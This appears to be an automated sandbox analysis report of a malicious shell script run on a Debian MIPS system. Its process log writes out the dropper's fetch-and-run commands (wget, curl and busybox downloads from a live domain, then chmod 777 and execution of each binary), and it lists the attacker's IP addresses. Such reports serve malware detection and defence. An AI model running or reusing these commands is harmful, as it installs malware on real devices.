Analysis Overview
SHA256
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1
Threat Level: Shows suspicious behavior
The file 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 02:20
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 02:20
Reported
2024-10-28 02:23
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 | /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 | N/A |
| N/A | /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd | /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd | N/A |
| N/A | /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX | /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX | N/A |
| N/A | /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 | /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 | N/A |
| N/A | /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme | /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme | N/A |
| N/A | /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc | /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc | N/A |
| N/A | /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB | /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB | N/A |
| N/A | /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N | /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N | N/A |
| N/A | /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS | /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS | N/A |
| N/A | /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G | /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G | N/A |
| N/A | /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ | /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ | N/A |
| N/A | /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 | /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 | N/A |
| N/A | /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly | /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly | N/A |
| N/A | /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 | /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 | N/A |
| N/A | /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 | /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 | N/A |
| N/A | /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 | /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 | N/A |
| N/A | /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd | /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd | N/A |
| N/A | /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX | /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX | N/A |
| N/A | /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme | /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme | N/A |
| N/A | /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS | /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS | N/A |
| N/A | /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G | /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme | /usr/bin/curl | N/A |
| File opened for modification | /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G | /usr/bin/curl | N/A |
Processes
/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/bin/chmod
[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9
[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/bin/rm
[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/bin/chmod
[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd
[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/bin/rm
[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/bin/chmod
[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX
[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/bin/rm
[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/bin/chmod
[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5
[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/bin/rm
[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/bin/chmod
[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme
[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/bin/rm
[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/bin/chmod
[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc
[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/bin/rm
[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/bin/chmod
[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB
[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/bin/rm
[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/bin/chmod
[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N
[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/bin/rm
[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/bin/chmod
[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS
[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/bin/rm
[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/bin/chmod
[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G
[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/bin/rm
[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/bin/chmod
[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ
[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/bin/rm
[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/bin/chmod
[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75
[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/bin/rm
[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/bin/chmod
[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly
[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/bin/rm
[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/bin/chmod
[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98
[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/bin/rm
[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/bin/chmod
[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5
[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/bin/rm
[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/bin/chmod
[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9
[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/bin/rm
[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/bin/chmod
[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd
[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/bin/rm
[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/bin/chmod
[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX
[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/bin/rm
[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/bin/chmod
[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme
[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/bin/rm
[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/bin/chmod
[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS
[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/bin/rm
[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/bin/chmod
[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G
[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/bin/rm
[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
